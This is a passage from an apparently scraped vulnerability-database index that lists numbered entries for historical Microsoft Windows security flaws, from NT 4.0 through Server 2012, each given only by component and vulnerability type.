authentication [74022] Microsoft Windows up to Vista Certificate weak authentication [73972] Microsoft Windows up to Vista SP2 PNG Parser information disclosure [73963] Microsoft Windows up to Vista SP2 Photo Decoder information disclosure [73961] Microsoft Windows 7 SP1/8/8.1/Server 2012/Server 2012 R2 Remote Desktop Protocol Object Management denial of service [73960] Microsoft Windows Netlogon Service User 7PK Security Features [73959] Microsoft Windows up to Vista SP2 DLL Data Processing Error [73958] Microsoft Windows up to Vista SP2 Text Services Data Processing Error [73957] Microsoft Windows up to Vista Adobe Font Driver privilege escalation [73956] Microsoft Windows up to Vista Adobe Font Driver privilege escalation [73955] Microsoft Windows up to Vista Adobe Font Driver privilege escalation [73954] Microsoft Windows up to Vista Adobe Font Driver privilege escalation [73953] Microsoft Windows up to Vista Adobe Font Driver information disclosure [73952] Microsoft Windows up to Vista Adobe Font Driver privilege escalation [73951] Microsoft Windows up to Vista Adobe Font Driver information disclosure [73950] Microsoft Windows up to Vista Adobe Font Driver memory corruption [73938] Microsoft Windows VBScript Scripting Engine denial of service [69258] Microsoft Windows up to Vista Secure Channel FREAK weak encryption [69161] Microsoft Windows up to Vista information disclosure [69160] Microsoft Windows up to Server 2012 Process privilege escalation [69159] Microsoft Windows up to Vista Group Policy 7PK Security Features [69154] Microsoft Windows up to Vista Group Policy weak authentication [69153] Microsoft Windows up to Vista Font Mapper win32k.sys privilege escalation [69152] Microsoft Windows up to Vista True Type Font win32k.sys privilege escalation [69151] Microsoft Windows up to Vista Kernel-Mode Driver win32k.sys memory corruption [69150] Microsoft Windows up to Vista win32k.sys privilege escalation [69149] Microsoft Windows up to Vista Cryptography Next Generation cng.sys information disclosure [69148] Microsoft Windows up to Vista Win32k.sys privilege escalation [68596] Microsoft Windows Internet Authentication Service denial of service [68593] Microsoft Windows up to Server 2012 Network Location Awareness Service privilege escalation [68590] Microsoft Windows up to Vista TS WebProxy directory traversal [68589] Microsoft Windows up to Vista Telnet Server memory corruption [66827] Microsoft Windows Media Player 11.0.5721.5230 memory corruption [66445] Microsoft Windows 8.0/8.1 XMLDOM ActiveX Control privilege escalation [65723] Microsoft Windows Authenticode WinVerifyTrust privilege escalation [62913] Microsoft Windows up to XP SP3 Shell Numeric Error [61648] Microsoft Windows XP privilege escalation [60245] Microsoft Windows unknown vulnerability [60209] Microsoft Windows msvcrt.dll memory corruption [60065] Microsoft Windows 2000 mod_sql information disclosure [59391] Microsoft Windows memory corruption [59006] Microsoft Windows Media Center TV Pack memory corruption [59004] Microsoft Windows memory corruption [58991] Microsoft Windows XP memory corruption [58238] Microsoft Windows Data Access Components memory corruption [58236] Microsoft Windows TCP/IP Stack denial of service [57812] Microsoft Windows XP lots-of-polys-example.html privilege escalation [57692] Microsoft Windows XP denial of service [57085] Microsoft Windows msgsc.dll memory corruption [57080] Microsoft Windows privilege escalation [57014] Microsoft Windows Default Configuration [56779] Microsoft Windows Stream Buffer Engine SBE.dll privilege escalation [56598] Microsoft Windows Azure Sdk up to 1.2 privilege escalation [56383] Microsoft Windows privilege escalation [56176] Microsoft Windows 7/Server 2003/XP fxscover.exe CDrawPoly::Serialize memory corruption [55937] Microsoft Windows XP denial of service [55777] Microsoft Windows Movie Maker 2.6 memory corruption [55776] Microsoft Windows memory corruption [55775] Microsoft Windows Media Encoder 9 memory corruption [54982] Microsoft Windows 7/Vista SP2 denial of service [54981] Microsoft Windows R2 privilege escalation [54718] Microsoft Windows up to XP SP3 Print Spooler EmeraldThread privilege escalation [54717] Microsoft Windows privilege escalation [54555] Microsoft Windows 6.00.2900.5512 wab.exe memory corruption [54553] Microsoft Windows sdclt.exe weak encryption [54552] Microsoft Windows smmscrpt.dll memory corruption [54551] Microsoft Windows contact memory corruption [54547] Microsoft Windows grpconv.exe memory corruption [54342] Microsoft Windows privilege escalation [54341] Microsoft Windows Movie Maker 2.1 privilege escalation [54334] Microsoft Windows privilege escalation [54333] Microsoft Windows denial of service [54332] Microsoft Windows privilege escalation [53591] Microsoft Windows Server 2003 GetServerName cross site scripting [53511] Microsoft Windows privilege escalation [53207] Microsoft Windows Graphics Driver cdd.dll Numeric Error [53104] Microsoft Windows smtpsvc.dll privilege escalation [53103] Microsoft Windows smtpsvc.dll weak encryption [52780] Microsoft Windows cabview.dll privilege escalation [52776] Microsoft Windows SMB Client denial of service [52775] Microsoft Windows denial of service [52774] Microsoft Windows SMB Client privilege escalation [52753] Microsoft Windows information disclosure [52336] Microsoft Windows denial of service [52283] Microsoft Windows Media Player 11.0.5721.5145 memory corruption [52036] Microsoft Windows 2000 MsgBox memory corruption [51997] Microsoft Windows Media Player 9 memory corruption [51811] Microsoft Windows max3activex.dll privilege escalation [51809] Microsoft Windows denial of service [51808] Microsoft Windows privilege escalation [51807] Microsoft Windows privilege escalation [51806] Microsoft Windows privilege escalation [51804] Microsoft Windows weak encryption [51803] Microsoft Windows denial of service [51796] Microsoft Windows privilege escalation [51795] Microsoft Windows race condition [51794] Microsoft Windows privilege escalation [51793] Microsoft Windows race condition [51497] Microsoft Windows Live Messenger 2009 ActiveX Control msnmsgr.exe denial of service [51135] Microsoft Windows ir32_32.dll memory corruption [51134] Microsoft Windows privilege escalation [51133] Microsoft Windows 2000 SP4/Server 2003 SP2/SP3/XP SP2 privilege escalation [51132] Microsoft Windows memory corruption [51128] Microsoft Windows privilege escalation [51078] Microsoft Windows denial of service [51077] Microsoft Windows privilege escalation [51076] Microsoft Windows denial of service [51075] Microsoft Windows privilege escalation [51073] Microsoft Windows weak authentication [50811] Microsoft Windows denial of service [50786] Microsoft Windows 2000 llssrv.exe memory corruption [50785] Microsoft Windows privilege escalation [50783] Microsoft Windows privilege escalation [50451] Microsoft Windows GDI+ Numeric Error [50449] Microsoft Windows EducatedScholar privilege escalation [50448] Microsoft Windows privilege escalation [50447] Microsoft Windows privilege escalation [50446] Microsoft Windows Media Player 6.4 memory corruption [50445] Microsoft Windows EducatedScholar denial of service [50444] Microsoft Windows Local Security Authority Subsystem Service Numeric Error [50439] Microsoft Windows Numeric Error [50438] Microsoft Windows weak encryption [50431] Microsoft Windows privilege escalation [50430] Microsoft Windows privilege escalation [50429] Microsoft Windows privilege escalation [49866] Microsoft Windows Server 2003 privilege escalation [49745] Microsoft Windows Server 2003 denial of service [49434] Microsoft Windows 7 denial of service [49394] Microsoft Windows Server 2003 privilege escalation [49393] Microsoft Windows privilege escalation [49392] Microsoft Windows memory corruption [49391] Microsoft Windows Avifil32.dll Numeric Error [49046] Microsoft Windows Server 2003 quartz.dll privilege escalation [49045] Microsoft Windows Server 2003 quartz.dll privilege escalation [48894] Microsoft Windows Server 2003 msvidctl.dll privilege escalation [48517] Microsoft Windows 2000 denial of service [48516] Microsoft Windows Server 2008 privilege escalation [48513] Microsoft Windows Search 4.0 cross site scripting [48512] Microsoft Windows Server 2008 privilege escalation [48033] Microsoft Windows XP denial of service [47804] Microsoft Windows Media Player 11.0.5721.5260 Numeric Error [47719] Microsoft Windows 2000 memory corruption [47717] Microsoft Windows privilege escalation [47715] Microsoft Windows 2000 Wordpad memory corruption [47465] Microsoft Windows GDI+ gdiplus.dll GpFont::SetData Numeric Error [47464] Microsoft Windows unlzh.c memory corruption [47091] Microsoft Windows Server 2008 privilege escalation [47090] Microsoft Windows Server 2008 privilege escalation [47089] Microsoft Windows weak authentication [46637] Microsoft Windows DNS Server denial of service [46620] Microsoft Windows Live Messenger 2009 msnmsgr.exe privilege escalation [46007] Microsoft Windows Mobile 6.0 FTP Service directory traversal [45911] Microsoft Windows Domain Controller privilege escalation [45907] Microsoft Windows XP chm memory corruption [45905] Microsoft Windows privilege escalation [45904] Microsoft Windows memory corruption [45763] Microsoft Windows Live Messenger up to 8.5.1 information disclosure [45676] Microsoft Windows Media Player 9 quartz.dll Numeric Error [45381] Microsoft Windows Server 2008/Vista SP1 Explorer denial of service [45380] Microsoft Windows Server 2008/Vista SP1 Search denial of service [45378] Microsoft Windows Media Player up to 6.4 information disclosure [45377] Microsoft Windows Media Format Runtime up to 9.5 privilege escalation [45197] Microsoft Windows 2000 nskey.dll memory corruption [45129] Microsoft Windows Live Messenger denial of service [45063] Microsoft Windows Server 2003 Active Directory information disclosure [44860] Microsoft Windows Media Player up to 9 privilege escalation [44533] Microsoft Windows 2000 mqsvc.exe privilege escalation [44249] Microsoft Windows XP SP3 gdiplus.dll Numeric Error [44246] Microsoft Windows XP SP3 denial of service [44227] Microsoft Windows Mobile 6.0 Bluetooth privilege escalation [44069] Microsoft Windows denial of service [43982] Microsoft Windows Image Acquisition Logger ActiveX Control privilege escalation [43953] Microsoft Windows ActiveX Control wmex.dll memory corruption [43676] Microsoft Windows 2000/Server 2003/Vista/XP privilege escalation [43675] Microsoft Windows 2000/Server 2003/Vista/XP of privilege escalation [43659] Microsoft Windows Messenger 5.1 ActiveX Control information disclosure [43658] Microsoft Windows XP SP2 nslookup.exe privilege escalation [43102] Microsoft Windows 2000 SP4/Server 2003 SP2/Server 2008 DNS unknown vulnerability [42732] Microsoft Windows Server 2003/Vista/XP privilege escalation [42731] Microsoft Windows Server 2003 privilege escalation [42638] Microsoft Windows Installer 3.1.4000.1823 ActiveX Control msiexec.exe memory corruption [42328] Microsoft Windows Live Onecare 1.1.3520.0 Malware Protection Engine mpengine.dll denial of service [42327] Microsoft Windows Live Onecare 1.1.3520.0 Malware Protection Engine mpengine.dll denial of service [41879] Microsoft Windows 2000/Server 2003/Vista memory corruption [41878] Microsoft Windows 2000/Server 2003/Vista weak authentication [41877] Microsoft Windows Server 2003 vbscript.dll privilege escalation [41656] Microsoft Windows privilege escalation [40987] Microsoft Windows 2000 privilege escalation [40986] Microsoft Windows Vista denial of service [40416] Microsoft Windows XP memory corruption [39937] Microsoft Windows Media Player 11 Numeric Error [39769] Microsoft Windows 2000 cryptgenrandom information disclosure [39749] Microsoft Windows 2000 msjet40.dll memory corruption [39655] Microsoft Windows Server 2003 Configuration [39324] Microsoft Windows Mobile 2005 SMS privilege escalation [39013] Microsoft Windows XP explorer.exe memory corruption [39012] Microsoft Windows Live Messenger up to 8.1 doc memory corruption [38999] Microsoft Windows Server 2003 explorer.exe denial of service [38962] Microsoft Windows Media Player 9 privilege escalation [38332] Microsoft Windows Gadgets memory corruption [38329] Microsoft Windows cross site scripting [38328] Microsoft Windows memory corruption [38326] Microsoft Windows 2000 attemptwrite Numeric Error [38272] Microsoft Windows Media Player 11 wmplayer.exe denial of service [38246] Microsoft Windows denial of service [37736] Microsoft Windows Vista unknown vulnerability [37526] Microsoft Windows 2000/Server 2003 denial of service [37251] Microsoft Windows 2000 memory corruption [37157] Microsoft Windows XP Graphics Device Interface gdiplus.dll denial of service [37093] Microsoft Windows Server 2003 Error Message unknown vulnerability [36515] Microsoft Windows 2000/Server 2003/XP memory corruption [36086] Microsoft Windows XP SP1 BMP Image Integer Coercion Error [36052] Microsoft Windows 2000 memory corruption [36002] Microsoft Windows 2000/XP denial of service [35900] Microsoft Windows up to Vista GDI memory corruption [35846] Microsoft Windows 2000/Server 2003 Default Configuration [35822] Microsoft Windows Proxy Server denial of service [35708] Microsoft Windows Vista Teredo Address privilege escalation [35707] Microsoft Windows Vista Meeting Space dfsr.exe unknown vulnerability [35706] Microsoft Windows Vista weak authentication [35705] Microsoft Windows Vista weak authentication [35704] Microsoft Windows Vista/XP ARP denial of service [35703] Microsoft Windows Vista LLTD Mapper denial of service [35702] Microsoft Windows Vista LLTD Responder weak authentication [35701] Microsoft Windows Vista LLTD Mapper weak authentication [35700] Microsoft Windows Vista LLTD Mapper weak authentication [35654] Microsoft Windows XP winmm.dll mmioread denial of service [35514] Microsoft Windows Explorer ole32.dll memory corruption [35206] Microsoft Windows Server 2003/XP denial of service [34994] Microsoft Windows 2000 OLE Dialog memory corruption [34967] Microsoft Windows Mobile 5.0 denial of service [34804] Microsoft Windows Mobile 5.0 memory corruption [34794] Microsoft Windows Vista Speech Recognition sapi.dll privilege escalation [34793] Microsoft Windows Mobile 5.0 denial of service [34690] Microsoft Windows Explorer 6.0.2900.2180 explorer.exe denial of service [34207] Microsoft Windows Mobile Pocket PC Bluetooth Stack unknown vulnerability [34206] Microsoft Windows Bluetooth Stack unknown vulnerability [34038] Microsoft Windows Event Viewer eventvwr.exe unknown vulnerability [33890] Microsoft Windows XP SP2 Explorer explorer.exe denial of service [33889] Microsoft Windows Media Player 10.00.00.4036 denial of service [33795] Microsoft Windows Media Player 6.4 memory corruption [33589] Microsoft Windows Live Messenger up to 8.0 denial of service [32899] Microsoft Windows Digital Rights Management drmstor.dll storelicense memory corruption [32694] Microsoft Windows 2000 privilege escalation [31797] Microsoft Windows File Viewer winhlp32.exe memory corruption [31736] Microsoft Windows XP gdiplus.dll denial of service [31521] Microsoft Windows NT 4.0/2000/XP IP Stack denial of service [31236] Microsoft Windows information disclosure [31133] Microsoft Windows Server 2003/XP explorer.exe memory corruption [31024] Microsoft Windows Live Messenger 8.0 memory corruption [30801] Microsoft Windows up to 2000 Connection Manager memory corruption [30799] Microsoft Windows 98/ME Rendering Engine polypolygon Numeric Error [30131] Microsoft Windows NT 4.0/XP/2000/Server 2003 Distributed Transaction Coordinator denial of service [29471] Microsoft Windows Help winhlp32.exe memory corruption [29383] Microsoft Windows XP unknown vulnerability [28987] Microsoft Windows NT 4.0/2000/Server 2003 Default Configuration denial of service [28452] Microsoft Windows 2000/Server 2003/XP unknown vulnerability [28254] Microsoft Windows 2000 Rendering Engine extescape denial of service [27519] Microsoft Windows Server 2003/XP mshtml.dll denial of service [27224] Microsoft Windows up to 1999 denial of service [27160] Microsoft Windows 2000/XP Rendering Engine gdi32.dll memory corruption [26923] Microsoft Windows XP Administrator Account unknown vulnerability [26618] Microsoft Windows 2000/XP Subsystem memory corruption [26535] Microsoft Windows Distributed Transaction Coordinator msdtcprx.dll ndrallocate privilege escalation [26534] Microsoft Windows denial of service [26523] Microsoft Windows 95/98/ME/NT 4.0 Terminal Service unknown vulnerability [26519] Microsoft Windows 95/98/ME/NT 4.0 Chart widechartomultibyte memory corruption [26517] Microsoft Windows 95/98/ME/NT 4.0 Certificates unknown vulnerability [26516] Microsoft Windows 95/98/ME/NT 4.0 Active Directory unknown vulnerability [26515] Microsoft Windows 95/98/ME/NT 4.0 Access Control List unknown vulnerability [25708] Microsoft Windows unknown vulnerability [25515] Microsoft Windows orun32.exe memory corruption [25513] Microsoft Windows XP Services for UNIX unknown vulnerability [25509] Microsoft Windows msasn1.dll memory corruption [25400] Microsoft Windows 98SE user32.dll denial of service [25399] Microsoft Windows XP denial of service [25256] Microsoft Windows XP denial of service [25185] Microsoft Windows Media Player ME unknown vulnerability [24907] Microsoft Windows 2000 TCP/IP Stack denial of service [24746] Microsoft Windows 2000/ME Explorer denial of service [24283] Microsoft Windows 2000/Server 2003/XP memory corruption [24252] Microsoft Windows 2000/NT memory corruption [23410] Microsoft Windows XP Utility Manager denial of service [22675] Microsoft Windows winhlp32.exe memory corruption [22602] Microsoft Windows 2000/NT BASE winhlp32.exe memory corruption [22560] Microsoft Windows Media Player 9.0 getiteminfobyatom unknown vulnerability [68403] Microsoft Windows up to Vista information disclosure [68196] Microsoft Windows up to Vista TrueType Array Index denial of service [68195] Microsoft Windows 7/Server 2003/Server 2008/Vista Input Method Editor privilege escalation [68192] Microsoft Windows up to Vista Remote Desktop Protocol weak authentication [68190] Microsoft Windows up to Vista Audio Service privilege escalation [68189] Microsoft Windows Server 2003 SP2 TCP/IP Stack privilege escalation [68184] Microsoft Windows up to Vista privilege escalation [68183] Microsoft Windows up to Vista Schannel privilege escalation [68165] Microsoft Windows up to XP OLE Automation Array OleAut32.dll SafeArrayDimen privilege escalation [68045] Microsoft Windows up to Vista SP2 OLE privilege escalation [67827] Microsoft Windows up to Vista win32k.sys privilege escalation [67826] Microsoft Windows up to Vista TrueType Font win32k.sys privilege escalation [67822] Microsoft Windows up to Vista OLE Object Packager packager.dll privilege escalation [67806] Microsoft Windows up to Vista TrueType Font privilege escalation [67362] Microsoft Windows up to Server 2012 R2 Remote Procedure Call denial of service [67326] Microsoft Windows Media Center MCPlayer.dll CSyncBasePlayer denial of service [67030] Microsoft Windows up to Vista Certificates weak authentication [67018] Microsoft Windows Server 2008/Server 2012/Server 2012 R2 Service Bus denial of service [66987] Microsoft Windows up to Vista Journal Parser privilege escalation [22011] Microsoft Windows Server 2003 idirectplay4 API denial of service [21967] Microsoft Windows 2000/ME Media Player cross site scripting [21926] Microsoft Windows XP Help Center HelpCtr.exe unknown vulnerability [21899] Microsoft Windows Server 2003/XP Help/Support Center dvdupgrd.htm memory corruption [21876] Microsoft Windows 98/2000/Server 2003/XP H.323 memory corruption [21873] Microsoft Windows ME/XP/NT 4.0/2000/Server 2003 memory corruption [21751] Microsoft Windows Media Services 4.1 TCP/IP Packet denial of service [21548] Microsoft Windows Media Player 9/ME PNG Image memory corruption [21476] Microsoft Windows 2000 Message Queue Manager memory corruption [21448] Microsoft Windows up to 2000 SP3/XP Terminal Service msgina.dll denial of service [21095] Microsoft Windows up to 2000 SP3 SMTP Service denial of service [20978] Microsoft Windows Server 2003 Shell Link directory traversal [20961] Microsoft Windows up to 2000 SP4 Troubleshooter ActiveX Control Tshoot.ocx RunQuery2 memory corruption [20960] Microsoft Windows up to Server 2003 Authenticode privilege escalation [20815] Microsoft Windows Distributed Component Object Model Interface memory corruption [20770] Microsoft Windows Media Player 7/8 IFRAME Tag privilege escalation [20662] Microsoft Windows up to 2000 SP3 shell32.dll ShellExecute memory corruption [20485] Microsoft Windows NT 4.0/2000 Media Services nsiislog.dll memory corruption [20307] Microsoft Windows NT 4.0/2000/XP RPC Endpoint Mapper denial of service [20213] Microsoft Windows 2000 Script Engine for JScript JScript.dll JsArrayFunctionHeapSort Integer Coercion Error [20182] Microsoft Windows ME Help/Support Center cross site scripting [20108] Microsoft Windows NT 4.0/2000/XP Terminal Server memory corruption [19970] Microsoft Windows 2000 Active Directory privilege escalation [19759] Microsoft Windows XP ISAKMP Service denial of service [19719] Microsoft Windows up to 2000 SP2 DCOM Client information disclosure [19574] Microsoft Windows 2000/XP Log Size denial of service [19490] Microsoft Windows Media Player up to 7.1 MP3 File Name mplay32.exe memory corruption [19355] Microsoft Windows 2000 TCP Packet denial of service [19315] Microsoft Windows XP Internet Explorer 6.0 privilege escalation [19261] Microsoft Windows XP Shell memory corruption [19231] Microsoft Windows XP Domain Controller unknown vulnerability [19194] Microsoft Windows 98/NT 4.0 Certificate weak authentication [19105] Microsoft Windows 2000/XP PPTP Service memory corruption [19082] Microsoft Windows 2000 SP2 SNMP LAN Manager denial of service [19063] Microsoft Windows NT 4.0/2000/XP Sun RPC Library Services denial of service [19062] Microsoft Windows NT 4.0/2000/XP Sun RPC Library Services denial of service [19061] Microsoft Windows 98/ME/XP ZIP Archive privilege escalation [19054] Microsoft Windows 2000/XP RDP denial of service [19053] Microsoft Windows 2000/XP RDP weak encryption [19043] Microsoft Windows NT 4.0/2000/XP CHM File memory corruption [19042] Microsoft Windows NT 4.0/2000/XP HTML Help ActiveX Control hhctrl.ocx alink memory corruption [18814] Microsoft Windows 98/98SE/ME/XP Crypto API weak authentication [18810] Microsoft Windows up to XP Certificate Enrollment ActiveX Control unknown vulnerability [18782] Microsoft Windows XP Help/Support Center uplddrvinfo.htm File denial of service [18772] Microsoft Windows NT 4.0/2000 SMB memory corruption [18709] Microsoft Windows HTML Help ActiveX Control Winhlp32.exe memory corruption [18537] Microsoft Outlook 2002 Windows Media Player player.launchurl cross site scripting [18464] Microsoft Windows 2000 Terminal Server privilege escalation [18395] Microsoft Windows Media Player 7.1 information disclosure [18351] Microsoft Windows Media Player 6.4/7.1 WMA Media File privilege escalation [18325] Microsoft Windows Media Player 8.00.00.4477 WMF File privilege escalation [18276] Microsoft Windows 2000 LANMAN Service denial of service [18214] Microsoft Windows XP TCP SYN denial of service [18130] Microsoft Windows 2000 denial of service [17973] Microsoft Windows 2000 Shell memory corruption [17960] Microsoft Windows 2000/XP SMTP Service denial of service [17959] Microsoft Windows 2000 SMTP Service privilege escalation [17958] Microsoft Windows up to XP SNMP Agent Service memory corruption [17947] Microsoft Windows 2000 Telnet Server memory corruption [17946] Microsoft Windows 2000/NT Authorization weak authentication [17890] Microsoft Windows XP Remote Desktop Client weak encryption [17871] Microsoft Windows ME SSDP Service ssdpsrv.exe denial of service [17834] Microsoft Windows 2000 NTFS privilege escalation [17761] Microsoft Windows 98/98SE/ME/XP UPnP denial of service [17760] Microsoft Windows 98/98SE/ME/XP UPnP memory corruption [17728] Microsoft Windows 2000 IKE denial of service [17718] Microsoft Windows 2000/XP Network Address Translation weak authentication [17660] Microsoft Windows 98/98SE/ME/XP UPnP denial of service [17658] Microsoft Windows Media Player up to 7.1 ASF File memory corruption [17655] Microsoft Windows NT 4.0/2000 Terminal Server denial of service [17608] Microsoft Windows XP Help Center helpctr.exe memory corruption [17572] Microsoft Windows NT 4.0 RPC Endpoint Mapper denial of service [17567] Microsoft Windows NT 4.0/2000 Terminal Server denial of service [17389] Microsoft Windows 2000 IrDA Driver memory corruption [17373] Microsoft Windows NT 4.0/2000 NNTP Service denial of service [17372] Microsoft Windows Media Player 6.4/7.0/7.1 NSC File memory corruption [17371] Microsoft Windows NT 4.0/2000 RPC Server denial of service [17310] Microsoft Windows NT 4.0/2000 DNS Server weak authentication [17266] Microsoft Windows NT 4.0 LsaQueryInformationPolicy information disclosure [17147] Microsoft Windows 2000 SMTP Service privilege escalation [17099] Microsoft Windows 98/98SE ARP denial of service [17056] Microsoft Windows 2000 Telnet Service denial of service [17055] Microsoft Windows 2000 Telnet Domain User information disclosure [17054] Microsoft Windows 2000 Telnet Service denial of service [17053] Microsoft Windows 2000 Telnet Session denial of service [17051] Microsoft Windows NT 4.0/2000 Visual Studio RAD fp30reg.dll memory corruption [17049] Microsoft Windows 2000 Message Request denial of service [16826] Microsoft Windows Media Player 6.4/7.0 Shortcut privilege escalation [16825] Microsoft Windows Media Player 6.3/6.4/7.0 ASX File memory corruption [16824] Microsoft Windows 2000 Internet Printing ISAPI Extension msw3prt.dll memory corruption [16706] Microsoft Windows Media Player 7 WMP ActiveX Control privilege escalation [16677] Microsoft Windows 98/2000 Java Applet denial of service [16600] Microsoft Windows 2000 Event Viewer memory corruption [16540] Microsoft Windows Media Player 7 Skin skin.wmz privilege escalation [16510] Microsoft Windows NT 4.0 PPTP Server denial of service [16457] Microsoft Windows NT 4.0 MTS Package Registry privilege escalation [16417] Microsoft Windows Media Services 4.0/4.1 Unicast Service denial of service [16381] Microsoft Windows 2000 RDP denial of service [16370] Microsoft Windows 2000/ME Web Extender Client privilege escalation [16305] Microsoft Windows NT 4.0 Terminal Server RegAPI.DLL memory corruption [16269] Microsoft Windows Media Player 6.4/7.0 ASX File memory corruption [16267] Microsoft Windows 2000 Telnet Service denial of service [16238] Microsoft Windows 95/98/98SE/NT 4.0 TCP Connection denial of service [16232] Microsoft Windows CE 3.0.9348 Initial Sequence Number weak authentication [16212] Microsoft Windows NT 4.0/2000 SMBnegprots Request denial of service [16191] Microsoft Windows 95/98/98SE/ME NMPI Listener denial of service [16190] Microsoft Windows 95/98/98SE/ME File/Print Sharing Service weak authentication [16140] Microsoft Windows Media Player 7 OCX Control denial of service [16098] Microsoft Windows NT 4.0 Cenroll ActiveX Control xenroll.dll denial of service [16055] Microsoft Windows 2000 System Monitor ActiveX Control memory corruption [16024] Microsoft Windows 95/98/98SE NetBIOS Client denial of service [15985] Microsoft Windows up to XP Office 2000 File riched20.dll privilege escalation [15980] Microsoft Windows Media Services 4.0/4.1 Unicast Service denial of service [15965] Microsoft Windows 2000 NTLM Authentication telnet.exe privilege escalation [15884] Microsoft Windows 95/98 IPX Packet denial of service [15805] Microsoft Windows 95/98/NT 4.0/2000 NetBIOS weak authentication [15802] Microsoft Windows NT 4.0/2000 NetBIOS Name Server denial of service [15726] Microsoft Windows 2000 Telnet Server denial of service [15725] Microsoft Windows 2000 Port denial of service [15722] Microsoft Windows 95/98/NT 4.0 ARP Table weak authentication [15644] Microsoft Windows NT 4.0 Remote Registry Request denial of service [15628] Microsoft Windows NT 4.0/2000 DCE/RPC Request SMBwriteX denial of service [15607] Microsoft Windows Media Services 4.0/4.1 Encoder Request denial of service [15593] Microsoft Windows 95/98/NT 4.0/2000 CIFS Computer Browser denial of service [15592] Microsoft Windows NT 4.0 CIFS Computer Browser denial of service [15575] Microsoft Windows 95/98/NT 4.0/2000 IP Fragmentation Jolt2 denial of service [15554] Microsoft Windows NT 4.0 Service Control Manager denial of service [15512] Microsoft Windows 95/98 NetBIOS denial of service [15475] Microsoft Windows NT 4.0/2000 cmd.exe memory corruption [15455] Microsoft Windows 98/XP/NT 4.0/2000 Domain Name Resolver weak authentication [15397] Microsoft Windows Media Rights Manager 4.0/4.1 denial of service [15341] Microsoft Windows Media Services 4.0/4.1 Handshake denial of service [15325] Microsoft Windows 2000 Share weak authentication [15188] Microsoft Windows NT 3.5/4.0 RSH Service Utility .rhosts privilege escalation [15177] Microsoft Windows NT 4.0/2000 Policy privilege escalation [15160] Microsoft Windows NT 4.0 SP2 Password Complexity passfilt.dll weak authentication [15147] Microsoft Windows NT 4.0 Netbt.sys denial of service [15142] Microsoft Windows NT 4.0 ICMP Subnet Mask denial of service [15140] Microsoft Windows NT 4.0 Routing Information Field denial of service [15139] Microsoft Windows NT 4.0 RPC denial of service [15135] Microsoft Windows 95 Remote Administration privilege escalation [15122] Microsoft Windows NT 4.0 SNMP Agent denial of service [15066] Microsoft Windows NT 4.0 Local Security Authority Subsystem LsaLookupSids privilege escalation [15065] Microsoft Windows NT 4.0 Keystream privilege escalation [15011] Microsoft Windows NT 4.0/2000 NTMail privilege escalation [15003] Microsoft Windows 95/98 Credential privilege escalation [14987] Microsoft Windows NT System Policy weak authentication [14986] Microsoft Windows 98/NT 4.0/2000 Wordpad memory corruption [14976] Microsoft Windows Media Player ActiveX Control File information disclosure [14974] Microsoft Windows 95/98 Network privilege escalation [14921] Microsoft Windows NT 4.0 LSA lsass.exe denial of service [14849] Microsoft Windows 98/NT 4.0 IP Source Routing privilege escalation [14848] Microsoft Windows NT 4.0 RASMAN Configuration [14800] Microsoft Windows NT 4.0 TCP Initial Sequence Number weak authentication [14778] Microsoft Windows 95/98 Telnet Client memory corruption [14767] Microsoft Windows NT 4.0 Terminal Server weak authentication [14740] Microsoft Windows NT 4.0 Messenger Service denial of service [14733] Microsoft Windows NT 4.0/2000 Local Security Authority Subsystem privilege escalation [14719] Microsoft Windows NT 4.0 IOCTL privilege escalation [14718] Microsoft Windows 95/98/NT 3.51/NT 4.0/2000 IGMP Header privilege escalation [14710] Microsoft Windows NT 4.0 Image Header privilege escalation [14709] Microsoft Windows NT 3.51/NT 4.0 RAS/PPTP denial of service [14697] Microsoft Windows NT 4.0 CSRSS Worker Thread denial of service [14669] Microsoft Windows NT 4.0 RRAS/RAS Client privilege escalation [14608] Microsoft Windows 95/98/NT 3.51/NT 4.0/2000 ARP Packet denial of service [14560] Microsoft Windows 95/98/NT 4.0 ICMP Redirect Message denial of service [14489] Microsoft Windows NT 4.0 SP4 NT Hash Value weak authentication [14487] Microsoft Windows 95/98 TCP/IP Chorus denial of service [14461] Microsoft Windows 98 Packet denial of service [14454] Microsoft Windows NT 4.0 Beta Share privilege escalation [14443] Microsoft Windows 95/98/NT 3.51/NT 4.0/2000 SMB Authentication weak authentication [14429] Microsoft Windows NT Registry Key Value privilege escalation [14428] Microsoft Windows NT Registry Key Permission privilege escalation [14423] Microsoft Windows 2000/NT PDC/BDC privilege escalation [14418] Microsoft Windows 2000/NT OS/2/POSIX Subsystem privilege escalation [14394] Microsoft Windows 2000/NT NT Alerter privilege escalation [14379] Microsoft Windows NT Registry Key privilege escalation [14378] Microsoft Windows NT 4.0/2000 User Group privilege escalation [14371] Microsoft Windows up to XP Log File Size unknown vulnerability [14370] Microsoft Windows up to XP Removable Media privilege escalation [14368] Microsoft Windows up to XP Logon Box Username information disclosure [14367] Microsoft Windows up to XP Eventlog privilege escalation [14366] Microsoft Windows up to XP Registry Key privilege escalation [14362] Microsoft Windows 95/98/ME/NT File System privilege escalation [14361] Microsoft Windows NT 4.0/2000 Relationship privilege escalation [14360] Microsoft Windows up to XP Registry privilege escalation [14359] Microsoft Windows up to XP Registry privilege escalation [14358] Microsoft Windows up to XP Registry Audit Policy privilege escalation [14356] Microsoft Windows up to XP File Audit Policy privilege escalation [14354] Microsoft Windows NT Password Filter PASSFILT.DLL weak authentication [14348] Microsoft Windows NT Directory privilege escalation [14311] Microsoft Windows NT Web Server information disclosure [14310] Microsoft Windows NT 4.0 Ressource Kit denial of service [14301] Microsoft Windows NT IP Fragmentation Data Processing Error [14298] Microsoft Windows NT 3.51/NT 4.0 WFTP Server Guest weak authentication [14238] Microsoft Windows 95/NT 4.0 TCP Packet weak authentication [14228] Microsoft Windows NT 4.0 RPC Server Snork denial of service [14197] Microsoft Windows NT 4.0 WINS denial of service [14128] Microsoft Windows NT 3.51/NT 4.0 WINS Coke denial of service [14077] Microsoft Windows NT 4.0 SMB Logon denial of service [14076] Microsoft Windows 95/NT 4.0 IP Fragmentation Bonk denial of service [14042] Microsoft Windows NT 4.0 SNMP Agent snmp.exe denial of service [14041] Microsoft Windows 95/NT 4.0 TCP SYN Teardrop2 denial of service [14040] Microsoft Windows 95/NT 3.51/NT 4.0 TCP SYN Teardrop denial of service [14031] Microsoft Windows 95/NT 4.0 TCP SYN Country denial of service [13992] Microsoft Windows WINS denial of service [13940] Microsoft Windows up to NT 4.0 SP2 IP Fragmentation privilege escalation [13924] Microsoft Windows up to NT 4.0 NetBIOS WinNuke denial of service [13911] Microsoft Windows NT 4.0 DNS Server denial of service [13907] Microsoft Windows NT 4.0 LSA/LSARPC 